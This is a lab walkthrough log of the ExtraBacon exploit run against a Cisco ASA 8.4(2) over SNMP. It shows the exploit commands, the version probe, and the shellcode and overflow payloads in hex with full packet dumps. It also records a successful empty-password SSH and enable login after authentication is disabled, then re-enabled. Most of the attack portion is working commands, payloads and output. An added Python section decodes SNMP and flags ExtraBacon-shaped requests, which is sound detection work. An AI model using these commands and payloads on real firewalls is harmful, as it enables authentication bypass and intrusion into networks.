Normal ssh connection
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
Checking exploit support
#python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing: extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version     = <ASN1_INTEGER[1L]>
  community   = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id          = <ASN1_INTEGER[0L]>
   |  error       = <ASN1_INTEGER[0L]>
   |  error_index = <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value       = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value       = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value       = <ASN1_STRING['asa.lab.net']>
[+] firewall uptime is 363400 time ticks, or 1:00:34
[+] firewall name is asa.lab.net
[+] target is running asa842, which is supported
Data stored in key file : asa842
Data stored in self.vinfo: ASA842
Launching the exploit (disabling passwords)
#python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing: extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (369):
3082016d0201010405636973636fa582015f020404c58e8e0201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000 30 82 01 6D 02 01 01 04 05 63 69 73 63 6F A5 82 0..m.....cisco..
[+] 0010 01 5F 02 04 04 C5 8E 8E 02 01 00 02 01 01 30 82 ._............0.
[+] 0020 01 4F 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .O0....+........
[+] 0030 85 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 ...........1...%
[+] 0040 F6 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 A5 A5 ..1......1......
[+] 0050 31 FA CD 80 EB 14 BF F0 8F 53 09 31 C9 B1 04 FC 1........S.1....
[+] 0060 F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF FF 31 .......^.......1
[+] 0070 C0 40 C3 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB .@...........1..
[+] 0080 A5 B5 AD AD 31 FB B9 A5 B5 A5 A5 31 F9 BA A2 A5 ....1......1....
[+] 0090 A5 A5 31 FA CD 80 EB 14 BF E0 13 08 08 31 C9 B1 ..1..........1..
[+] 00a0 04 FC F3 A4 E9 0C 00 00 00 5E EB EC E8 F8 FF FF .........^......
[+] 00b0 FF 31 C0 40 C3 C3 30 81 B8 06 81 B3 2B 06 01 04 .1.@..0.....+...
[+] 00c0 01 09 09 83 6B 01 03 03 01 01 05 09 5F 81 38 43 ....k......._.8C
[+] 00d0 7B 7A 81 2D 35 81 25 81 25 81 25 81 25 81 03 81 {z.-5.%.%.%.%...
[+] 00e0 6C 04 81 09 04 24 81 09 81 65 81 03 81 45 48 31 l....$...e...EH1
[+] 00f0 81 40 31 81 5B 81 33 10 31 81 76 81 3F 81 2E 81 .@1.[.3.1.v.?...
[+] 0100 2A 81 2A 81 2A 81 01 81 77 81 25 81 25 81 25 81 *.*.*...w.%.%.%.
[+] 0110 25 60 81 0B 81 04 24 81 60 01 00 00 04 31 81 7F %`....$.`....1..
[+] 0120 81 50 61 81 43 81 10 81 10 81 10 81 10 81 10 81 .Pa.C...........
[+] 0130 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................
[+] 0140 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................
[+] 0150 10 81 10 81 10 81 10 81 10 81 10 81 10 19 47 14 ..............G.
[+] 0160 09 81 0B 7C 24 14 81 0B 07 81 7F 81 60 81 10 05 ...|$.......`...
[+] 0170 00 .
****************************************
[+] response:
###[ SNMP ]###
  version     = <ASN1_INTEGER[1L]>
  community   = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id          = <ASN1_INTEGER[80055950L]>
   |  error       = <ASN1_INTEGER[0L]>
   |  error_index = <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value       = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value       = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected
Ssh connection with password disabled
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa>enable
Password: <enter>
asa#exit
Launching the exploit (re-enabling passwords)
#python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing: extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369): [hex omitted]
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000 30 82 01 6D 02 01 01 04 05 63 69 73 63 6F A5 82 0..m.....cisco..
[+] 0010 01 5F 02 04 19 57 CD 41 02 01 00 02 01 01 30 82 ._...W.A......0.
[+] 0020 01 4F 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .O0....+........
[+] 0030 85 EB 14 BF F0 8F 53 09 31 C9 B1 04 FC F3 A4 E9 ......S.1.......
[+] 0040 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 31 C0 89 /...^.......U1..
[+] 0050 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 F6 ..........1...%.
[+] 0060 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 A5 31 .1......1......1
[+] 0070 FA CD 80 EB 14 BF E0 13 08 08 31 C9 B1 04 FC F3 ..........1.....
[+] 0080 A4 E9 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 89 ../...^.......U.
[+] 0090 E5 57 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 .W..........1...
[+] 00a0 B5 AD AD 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 ...1......1.....
[+] 00b0 A5 31 FA CD 80 C3 30 81 B8 06 81 B3 2B 06 01 04 .1....0.....+...
[+] 00c0 01 09 09 83 6B 01 03 03 01 01 05 09 5F 81 38 43 ....k......._.8C
[+] 00d0 7B 7A 81 2D 35 81 25 81 25 81 25 81 25 81 03 81 {z.-5.%.%.%.%...
[+] 00e0 6C 04 81 09 04 24 81 09 81 65 81 03 81 45 48 31 l....$...e...EH1
[+] 00f0 81 40 31 81 5B 81 33 10 31 81 76 81 3F 81 2E 81 .@1.[.3.1.v.?...
[+] 0100 2A 81 2A 81 2A 81 01 81 77 81 25 81 25 81 25 81 *.*.*...w.%.%.%.
[+] 0110 25 60 81 0B 81 04 24 81 60 01 00 00 04 31 81 7F %`....$.`....1..
[+] 0120 81 50 61 81 43 81 10 81 10 81 10 81 10 81 10 81 .Pa.C...........
[+] 0130 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................
[+] 0140 10 81 10 81 10 81 10 81 10 81 10 81 10 81 10 81 ................
[+] 0150 10 81 10 81 10 81 10 81 10 81 10 81 10 19 47 14 ..............G.
[+] 0160 09 81 0B 7C 24 14 81 0B 07 81 7F 81 60 81 10 05 ...|$.......`...
[+] 0170 00 .
****************************************
[+] response:
###[ SNMP ]###
  version     = <ASN1_INTEGER[1L]>
  community   = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id          = <ASN1_INTEGER[425184577L]>
   |  error       = <ASN1_INTEGER[0L]>
   |  error_index = <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value       = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid         = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value       = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected
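Both exec runs above (pass-disable and pass-enable) send the same shape of SNMP v2c GetBulkRequest: one varbind whose OID has 112 arcs under the 1.3.6.1.4.1.9.9.491 subtree, and one varbind that carries a 133-byte OCTET STRING value where a request would normally carry NULL. The following is an added example, not part of the original log and not code from the extrabacon tool: a dependency-free BER walker that decodes an SNMP v1/v2c message and reports those two traits on request PDUs, which is what a network sensor or pcap triage script would look for. The thresholds MAX_ARCS and MAX_VALUE_LEN, the small encoder used only to build test input, and the two sample packets (a benign sysDescr.0 GetRequest and an ExtraBacon-shaped GetBulk with arbitrary filler arcs and filler value bytes, no payload) are all constructed for this example.

```python
# Added example: SNMP v1/v2c BER decoding plus two ExtraBacon-shaped heuristics.
# Not the extrabacon tool's code; thresholds and sample packets are constructed.

CISCO_491 = [1, 3, 6, 1, 4, 1, 9, 9, 491]   # enterprise subtree seen in the log
MAX_ARCS = 40          # constructed threshold: real MIB OIDs stay well below this
MAX_VALUE_LEN = 32     # request varbind values should be NULL, not long strings
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}


def _read_tlv(buf, pos):
    """Return (tag, contents, next_pos) for the BER TLV starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: 0x8N then N length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw):
    """Decode base-128 OID contents into a list of arcs (first arc < 80 assumed)."""
    arcs, value = [], 0
    for b in raw:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                    # last byte of this arc
            arcs.append(value)
            value = 0
    return [arcs[0] // 40, arcs[0] % 40] + arcs[1:]


def parse_snmp(packet):
    """Decode an SNMP v1/v2c message into a dict; varbinds are (arcs, tag, value)."""
    tag, body, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_tag, pdu, _ = _read_tlv(body, pos)
    _, req_id, pos = _read_tlv(pdu, 0)
    _, _, pos = _read_tlv(pdu, pos)         # error-status (non-repeaters for GetBulk)
    _, _, pos = _read_tlv(pdu, pos)         # error-index (max-repetitions for GetBulk)
    _, vb_list, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vb_list):
        _, vb, pos = _read_tlv(vb_list, pos)
        _, oid_raw, q = _read_tlv(vb, 0)
        vtag, vval, _ = _read_tlv(vb, q)
        varbinds.append((_decode_oid(oid_raw), vtag, vval))
    return {"version": int.from_bytes(version, "big"),
            "community": community.decode("ascii", "replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(req_id, "big", signed=True),
            "varbinds": varbinds}


def suspicious_findings(packet):
    """Describe ExtraBacon-shaped traits found in a request PDU (empty if clean)."""
    msg = parse_snmp(packet)
    findings = []
    if msg["pdu"] == "Response":            # only score requests sent to the device
        return findings
    for arcs, vtag, vval in msg["varbinds"]:
        if vtag != 0x05 and len(vval) > MAX_VALUE_LEN:
            findings.append(f"{msg['pdu']} carries a {len(vval)}-byte value instead of NULL")
        if len(arcs) > MAX_ARCS:
            where = " under 1.3.6.1.4.1.9.9.491" if arcs[:9] == CISCO_491 else ""
            findings.append(f"oversized OID{where}: {len(arcs)} arcs")
    return findings


# Tiny BER encoder, used only to build the constructed sample packets below.
def _tlv(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def _encode_oid(arcs):
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]                  # low 7 bits last, continuation bits first
        while a > 0x7F:
            a >>= 7
            chunk.append(0x80 | (a & 0x7F))
        out.extend(reversed(chunk))
    return bytes(out)


def build_request(pdu_tag, request_id, varbinds, community=b"public"):
    """Build a v2c request; varbinds are (arcs, value_tag, value_bytes)."""
    vb_list = b"".join(_tlv(0x30, _tlv(0x06, _encode_oid(o)) + _tlv(t, v))
                       for o, t, v in varbinds)
    pdu = (_tlv(0x02, request_id.to_bytes(4, "big")) + _tlv(0x02, b"\x00")
           + _tlv(0x02, b"\x01") + _tlv(0x30, vb_list))
    return _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x04, community) + _tlv(pdu_tag, pdu))


# Constructed samples: an ordinary sysDescr.0 GetRequest, and a GetBulkRequest
# with the same shape as the log's request (long OID under the Cisco 491 subtree
# plus a long OCTET STRING value). Filler arcs and value bytes are arbitrary.
BENIGN = build_request(0xA0, 1, [([1, 3, 6, 1, 2, 1, 1, 1, 0], 0x05, b"")])
LONG_OID = CISCO_491 + [1, 3, 3, 1, 1, 5, 9] + [165] * 100
SHAPED = build_request(0xA5, 2, [([1, 3, 6, 1, 2, 1, 1, 1], 0x04, b"A" * 133),
                                 (LONG_OID, 0x05, b"")], community=b"cisco")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("shaped", SHAPED)):
        print(name, parse_snmp(pkt)["pdu"], suspicious_findings(pkt) or "clean")
```

In practice the input to suspicious_findings would be the UDP payload of each packet to port 161 pulled from a capture; the decoder deliberately ignores the payload bytes themselves and keys only on structure, so it does not depend on the version-specific shellcode seen in the log.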
Normal ssh connection
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:
References
https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/